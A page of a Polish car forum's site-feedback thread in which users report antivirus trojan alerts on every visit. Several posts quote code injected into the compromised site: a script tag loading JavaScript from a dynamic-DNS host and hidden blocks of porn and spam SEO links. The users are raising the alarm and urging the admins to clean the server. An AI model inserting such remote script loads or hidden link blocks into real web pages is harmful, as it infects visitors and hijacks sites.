Forum motoryzacyjne | autoGALERIA.pl
Strona 12 z 37 PierwszyPierwszy 12345678910111213141516171819202122232425262728 ... OstatniOstatni
Pokaż wyniki od 111 do 120 z 361

Wątek: Uwagi dotyczące działania forum

  1. #111

    Dołączył
    12/2012
    Skąd
    Poznań
    Posty
    1,086
    Auto
    S40 D3, Superb III 1.8tsi L&K

    Domyślnie

    Win. 7 + Opera/Firefox/IE + ESET Smart Security - Powiadomienie o zablokowanej próbie ataku (trojan) przy KAŻDYM odświeżeniu forum.

    Zaskakujące jest to, że części użytkowników ten problem nie dotyczy (albo dotyczy, ale ich antywirusy nie wyłapują, sam nie wiem). Nie zmienia to jednak faktu, że tak duża i szanowana strona powinna się zająć problemem, a póki co nie ma żadnego znaku ze strony administratora czy i kiedy problem zostanie rozwiązany.

  2. #112
    Awatar genesis
    Dołączył
    04/2009
    Skąd
    tu i tam
    Posty
    719
    Auto
    Tiggy MY 2009

    Domyślnie

    To tylko źle swiadczy o ich antywirusach. Akurat kaspersky i eset to czolowka i nie dziwne, że właśnie one wylapuja problem.
    DADRL wyłącz światła - włącz myślenie

  3. #113

    Dołączył
    12/2012
    Skąd
    Poznań
    Posty
    1,086
    Auto
    S40 D3, Superb III 1.8tsi L&K

    Domyślnie

    U mnie sytuacja z trojanem nadal się nie zmieniła. Od 9 dni każde odświeżenie forum skutkuje 'atakiem'. Jak wygląda to u innych? Przyznam szczerze, że irytuje mnie taka sytuacja. Jeżeli dzieje się to tylko i wyłącznie na aG, to znaczy, że to u Was na serwerze coś siedzi. Albo problem jest tak duży, że trwa to tak długo (wtedy przydałaby się jakaś informacja), albo po prostu lejecie na to sikiem prostym... Póki co zrezygnowałem z odwiedzin Waszej strony na wszelakich urządzeniach mobilnych, a jak tak dalej pójdzie to...

  4. #114

    Dołączył
    09/2013
    Skąd
    Zabrze
    Posty
    90
    Auto
    Megane IV Grandtour 1,3 115 KM

    Domyślnie

    Cytat Zamieszczone przez genesis Zobacz posta
    To tylko źle swiadczy o ich antywirusach. Akurat kaspersky i eset to czolowka i nie dziwne, że właśnie one wylapuja problem.
    Wcześniej wspominałem, że używam ESET SS i nic nie wykrywa a u innych tak, więc chyba nie zależy to od antywirusa. Tym bardziej, że zawsze aktualny (podobnie jak system i aplikacje).
    Sprawdzałem w pracy gdzie mamy Symanteca i też nic nie widzi.

  5. #115

    Domyślnie

    U mnie Norton przestał szaleć dobrych kilka dni temu, zarówno w domu jak i we firmie. Sprawdzałem w tym momencie jeszcze przez przetestowanie www pod kątem wirusów, ale też nic nie znajduje:
    https://www.virustotal.com/pl/url/7b...is/1381939939/
    https://www.siteadvisor.com/sites/ht...ref=safesearch

    Napiszę maila do RedNacza jak ma się sytuacja na froncie, bo wiem, że coś działał w tej kwestii.

  6. #116

    Dołączył
    12/2012
    Skąd
    Poznań
    Posty
    1,086
    Auto
    S40 D3, Superb III 1.8tsi L&K

    Domyślnie

    Na informatyce zupełnie się nie znam, ale spojrzałem sobie na źródło strony forum aG i dokładnie ten fragment kodu:
    <script src="http://newtestkal.homeftp.net/tomove.js"></script> w skrypcie Waszej strony ESET Smart Security oznacza jako zagrożenie w formie konia trojańskiego z typu iframe. Poczytałem o tym i działa to na zasadzie dopisywania do kodu jakichś poukrywanych odnośników do zarażonych stron.

    Kliknij obrazek, aby uzyskać większą wersję

Nazwa:	trojan aG.JPG
Wyświetleń:	55
Rozmiar:	21.2 KB
ID:	5475

    Cytat Zamieszczone przez seimi Zobacz posta
    Wcześniej wspominałem, że używam ESET SS i nic nie wykrywa a u innych tak, więc chyba nie zależy to od antywirusa. Tym bardziej, że zawsze aktualny (podobnie jak system i aplikacje).
    Sprawdzałem w pracy gdzie mamy Symanteca i też nic nie widzi.
    Może głupie pytanie, ale masz w Esecie włączone powiadomienia? Bo może być tak, że nie wszystko masz 'zaptaszkowane' w ustawieniach i nawet nie wiesz, że Ci antywir coś blokuje. Możesz też spojrzeć w Kwarantanne czy nie siedzą te trojany (bo u mnie jest ich tam od groma).

  7. #117

    Dołączył
    09/2013
    Skąd
    Zabrze
    Posty
    90
    Auto
    Megane IV Grandtour 1,3 115 KM

    Domyślnie

    Rzeczywiście - miałem wyłączone powiadomienia no i w kwarantannie trochę tego siedzi...
    Dzięki za zwrócenie uwagi.

  8. #118

    Dołączył
    04/2012
    Skąd
    ----
    Posty
    115
    Auto
    różne

    Domyślnie

    Na końcu strony pojawia się kod:


    <!--silinmesin--><font style="overflow: auto; position: absolute; height: 0pt; width: 0pt"><a title="porno" href="http://www.abazapornoizle.com" rel="dofollow">porno</a><a title="film izle" href="http://www.chdfilmizle.net" rel="dofollow">film izle</a></font>
    <a href="http://www.forumsamochodowe.pl" title="Forum Motoryzacyjne" target="_blank">Forum Samochodowe</a>.

    Panowie zróbcie coś z tym.
    Ostatnio unikam czytania forum ze względu na trojany.

  9. #119

    Dołączył
    12/2012
    Skąd
    Poznań
    Posty
    1,086
    Auto
    S40 D3, Superb III 1.8tsi L&K

    Domyślnie

    Dzisiaj doszły kolejne dziwne objawy. Jak jestem na forum zalogowany to wszystko jest ok, ale jak się wyloguję to język zmienia się na angielski i zamiast polskich liter są same krzaczki.
    Panowie! Zróbcie coś z tym, bo problem (z trojanami) trwa już 10 dni, a poprawy nie widać. Jesteście jedną z największych stron w kraju a takie historie reklamy Wam najlepszej nie robią. Jak nie potraficie sobie z tym poradzić to chyba lepszym rozwiązaniem jest po prostu wyłączenie forum, a nie ryzykowanie zainfekowania komputerów odwiedzających (którzy nie mają antywirusów, albo mają kiepskie, które nie wyłapują tego syfu).

  10. #120
    Awatar Arrival
    Dołączył
    07/2012
    Skąd
    Rzeszów
    Posty
    254
    Auto
    Kia Proceed 1.4 T-GDi 7DCT

    Domyślnie

    Macie włam instalujący wirusy i ukrywający linki porno. Oprócz wyżej wymienionych jest jeszcze warstwa z:
    <div style="display:none">
    <a href="http:// www. burunca. org/" title="burun ameliyati">burun ameliyati</a>
    <a href="http:// www. burunca. org/" title="burun estetigi">burun estetigi</a>
    <a href="http:// www. xtravestiler. org/" title="travesti">travesti</a>
    <a href="http:// www. xtravestiler. org/" title="travestiler">travestiler</a>
    <a href="http:// www. pornomarka. org/" title="sikis">sikis</a>
    <a href="http:// www. pornmark. net/" title="porn tube">porn tube</a>
    </div>
    Polecam się pilnie sprawą zająć, bo jak Was google oflaguje to spore straty odnotujecie . Sprawdźcie też dla pewności .htaccess czy nie ma dziwnych przekierowań.

Uprawnienia umieszczania postów

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •